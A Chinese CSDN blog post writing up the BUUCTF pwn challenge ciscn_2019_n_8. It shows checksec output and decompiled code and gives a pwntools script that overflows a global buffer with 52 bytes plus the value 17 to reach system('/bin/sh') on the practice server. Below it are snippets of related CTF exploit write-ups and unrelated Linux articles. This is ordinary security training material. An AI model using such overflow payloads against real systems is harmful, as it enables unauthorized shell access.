BUU刷题-Pwn-ciscn_2019_n_8

最新推荐文章于 2025-08-26 20:48:33 发布
最新推荐文章于 2025-08-26 20:48:33 发布
阅读量98 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: BUU_pwn解题wp 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_65474192/article/details/131657012
文章描述了一个32位ELF可执行文件,该文件包含一个栈溢出漏洞。通过输入特制的字符串,可以覆盖内存,使得`*(_QWORD*)&var[13]`等于17,从而触发`system(/bin/sh)`调用,获得shell。由于存在部分RELRO和Canary等安全机制,利用过程需要绕过这些防护。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

解题思路:

泄露或修改内存数据:

  1. 堆地址:无需
  2. 栈地址:[[Stack溢出覆盖内存]]
  3. libc地址:无需
  4. BSS段地址:无需
    劫持程序执行流程:
    获得shell或flag:[[调用程序中的system]]
学到的知识:
题目信息:
┌──(kali㉿kali)-[~/Desktop]
└─$ file ciscn_2019_n_8       
ciscn_2019_n_8: ELF 32-bit LSB pie executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=44b5b2d71c377819ef3c53a4511038cd2b25a368, for GNU/Linux 3.2.0, not stripped
                                                                                                                     
┌──(kali㉿kali)-[~/Desktop]
└─$ checksec --file=ciscn_2019_n_8
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified    Fortifiable     FILE
Partial RELRO   Canary found      NX enabled    PIE enabled     No RPATH   No RUNPATH   79) Symbols       No    0   1ciscn_2019_n_8

libc版本:
wp借鉴:

核心伪代码分析:

存在利用的的代码:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [esp-14h] [ebp-20h]
  int v5; // [esp-10h] [ebp-1Ch]

  var[13] = 0;
  var[14] = 0;
  init();
  puts("What's your name?");
  __isoc99_scanf("%s", var, v4, v5);
  if ( *(_QWORD *)&var[13] )
  {
    if ( *(_QWORD *)&var[13] == 17LL )
      system("/bin/sh");
    else
      printf(
        "something wrong! val is %d",
        var[0],
        var[1],
        var[2],
        var[3],
        var[4],
        var[5],
        var[6],
        var[7],
        var[8],
        var[9],
        var[10],
        var[11],
        var[12],
        var[13],
        var[14]);
  }
  else
  {
    printf("%s, Welcome!\n", var);
    puts("Try do something~");
  }
  return 0;
}
分析:

通过栈溢出实现* ( _ QWORD * )& var [ 13 ] == 17LL即可。

脚本:
from pwn import *
context(log_level='debug',arch='i386',os='linux')

pwnfile='./ciscn_2019_n_8'
sh=remote('node4.buuoj.cn',26596)
#sh=process(pwnfile)

payload=13*4*b'a'+p32(17)

#gdb.attach(sh)
#pause()

sh.sendline(payload) 

sh.interactive()
buuctf之ciscn_2019_c_1
weixin_54452942的博客
04-18 914
通俗易懂
BUUCTF-PWN记录-22
weixin_44145820的博客
05-18 796
目录ciscn_2019_n_2(double free) ciscn_2019_n_2(double free) delete的时候有一个double free漏洞 利用思路: 先用一个double free把0x602060(chunklist)申请出来,这样我们就能先修改里面的指针了,先利用GOT表泄露libc,然后写入__free_hook的地址并使用编辑写入system地址就行 Exp: from pwn import * menu = "Your choice: " def add(con
BUUCTF-PWN】4-ciscn_2019_n_1
燕麦葡萄干的博客
07-04 651
这里为了堆栈平衡+1反而没办法打通,不+1反而可以成功,因此后面做的时候加不加1都试一下。需要v1变量溢出到v2,然后给v2 11.28125的值。查看变量在栈中的位置:v1 0x30 v2 0x04。11.28125的十六进制值是0x41348000。checksec检查是64位,开启了NX保护。这里再试验第二种思路,溢出到变量2。后门函数的地址是0x4006BE。
BUUCTF之路-pwn-ciscn_2019_n_81
qq_30528603的博客
11-29 256
查保护的时候吓了一跳,保护全开。大致看出var是个数组,当var[13]=17的时候就会得到system。
BUU-Pwn-ciscn_2019_n_5
一个啥也不会的小菜鸡!
06-23 200
通过向name中写入shellcode,并执行该shellcode。
BUU-Pwn-ciscn_2019_n_1
一个啥也不会的小菜鸡!
06-23 219
在rodate段,可以找到11.28125的十六进制表示形式为0x41348000h。要将V2变为11.28125,必须知道11.28125的十六进制表示形式。利用栈溢出覆盖v2改变其值,获得flag。[[双精度浮点数存储]]
BUU-Pwn-ciscn_2019_en_2(和BUUciscn_2019_c_1为同一
一个啥也不会的小菜鸡!
06-21 245
是一个菜单,有一个栈溢出漏洞,但里面有字符串加密逻辑,绕过后才可以使用栈溢出。而且本中没有后门函数等,所以需要自己去寻找,首先泄露除一个函数地址,进而计算出system和“/bin/sh”的位置。通过ROPgadget --binary ciscn_2019_c_1 >gadgets。-》puts_got_addr的地址。-》puts_plt_addr的地址。通过IDA测算栈溢出距离:0x50。[[ROPgadget的使用]]获取pop_rdi_ret片段。[[Stack上函数传参]]
BUU-Pwn-ciscn_2019_c_1
一个啥也不会的小菜鸡!
07-11 518
是一个菜单,有一个栈溢出漏洞,但里面有字符串加密逻辑,绕过后才可以使用栈溢出。而且本中没有后门函数等,所以需要自己去寻找,首先泄露除一个函数地址,进而计算出system和“/bin/sh”的位置。通过ROPgadget --binary ciscn_2019_c_1 >gadgets。-》puts_got_addr的地址。-》puts_plt_addr的地址。通过IDA测算栈溢出距离:0x50。[[ROPgadget的使用]]获取pop_rdi_ret片段。[[Stack上函数传参]]
BUUCTF之路-ciscn_2019_c_11
qq_30528603的博客
05-29 459
因为程序走到这时puts函数已经执行过了,got表里面填充的就是puts函数的真实地址,因此我们再次调用一次puts函数并把puts的got表的内容当做参数传给puts函数,所以程序会去puts_plt去执行puts函数,并把puts函数的真实地址打印出来。我们分析这里是做什么的,得到了puts_addr这个puts函数的真实地址,减去puts在libc的偏移得到Libc加载的真实基地址,然后利用基地址加上system函数的偏移得到system函数的真实地址。这是个64位的程序,没有开启金丝雀和PIE。
BUU-Pwn-ciscn_2019_ne_5
一个啥也不会的小菜鸡!
07-11 95
利用工具找到system和“sh”[[ROPgadget的使用]][[objdump的使用]]
BUUCTF-PWN记录-21
weixin_44145820的博客
05-15 774
目录wdb_2018_1st_babyheap(unlink, UAF) wdb_2018_1st_babyheap(unlink, UAF) add的大小固定为0x20 edit机会只有三次 指针悬挂 利用思路如下: 进行几次添加 add(0, (p64(0)+p64(0x31))*2) add(1, 'aaa\n') add(2, 'aaa\n') add(3, 'aaa\n') add(4, '/bin/sh\n') 删除0和1,再删除一次0,此时show(0)能泄露出heap的地址
BUUCTF-PWN记录-14
weixin_44145820的博客
04-29 906
目录sctf_2019_easy_heap(块重叠,double free) sctf_2019_easy_heap(块重叠,double free) 这目好像是在Ubuntu16下的,但是BUU上面是Ubuntu18,所以应该更简单一点 总的来说,这应该是ciscn_2019_final_3的加强版吧,当然也有更简单的地方 首先,给了我们一块rwx的空间 add函数会给你conten...
BUUCTF-pwn记录(22-7-30更新)
Morphy_Amo的博客
03-04 4469
BUUCTF记录
linux、window java程序导出pdf\word、excel文字字体显示异常、字体样式不一样
qq_42383283的博客
08-26 311
如何在JRE中更改字体解决显示问 摘要:要解决Java应用程序字体显示问,可进入JRE安装目录的/jre/lib/fonts路径,新建fallback文件夹(需确保是当前Web服务器使用的JDK目录),将Windows字体文件复制到该文件夹(可选择性复制所需字体),最后重启Web服务器即可。此方法能有效解决因字体缺失导致的显示异常问
Linux磁盘手动再分配
Laity
08-25 586
摘要: 本文记录了在openEuler 24.03系统(aarch64架构)下调整磁盘分区的操作流程。通过卸载/home逻辑卷并缩减其容量(30T→28T),将2T空间扩展至根分区(69G→2.1T)。关键步骤包括:备份/home数据、卸载分区、删除逻辑卷、扩展root空间、重建/home逻辑卷并恢复数据。操作涉及lvremove、lvextend、resize2fs等命令,最终通过df -h验证调整结果,确保数据完整性。
linux 用户、用户组、权限概述
源码老人的专栏
08-26 179
Linux系统通过用户和组管理文件访问权限,主要涉及用户账号(/etc/passwd)、密码(/etc/shadow)和组信息(/etc/group)。权限管理支持字符表示法(u/g/o/a配合+/-/=设置rwx权限)和数字表示法(r=4,w=2,x=1组合)。常用命令包括useradd添加用户、passwd修改密码、chmod修改权限(支持-R递归操作),通过文件类型标识(d/-)和权限位(user/group/other)实现精细的访问控制。
#Linux内存管理学以致用# 请你根据linux 内核struct page 结构体的双字对齐的设计思想,设计一个类似的结构体
sinat_37817094的博客
08-26 328
/ 映射计数(类似page_mapcount)使用flags的高位存储页状态(如PG_locked、PG_dirty),低位存储区信息(如zone_id)。// 关联的地址空间。#define MY_CHUNK_TYPE_MASK 0x0000000C // 类型掩码(2位)// LRU链表(用于缓存)#define MY_CHUNK_LOCKED 0x00000001 // 块已锁定。#define MY_CHUNK_DIRTY 0x00000002 // 块已修改。// 状态标志(对齐到8字节)
Linux 网络数据收发全栈工具书:从 nc、socat 到 iperf3 的 Buildroot 路径与跨平台实战
最新发布
leichaohahah的博客
08-26 541
Packet Sender ✅ 跨平台 GUI GitHub Releases 下载 exe,支持 TCP/UDP/SSL 一键发包。Linux 网络数据收发全栈工具书:从 nc、socat 到 iperf3 的 Buildroot 路径与跨平台实战。nc/socat/tcpdump ✅ 通过 WSL 或 Cygwin Windows Store 装 WSL →。标签:Linux、Buildroot、网络调试、iperf3、netcat、Windows、tcpdump。四、Windows 也能用吗?
Linux 系统内存不足导致服务崩溃的排查方法
2409_89014517的博客
08-25 592
Linux 系统内存不足导致服务崩溃的排查方法
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值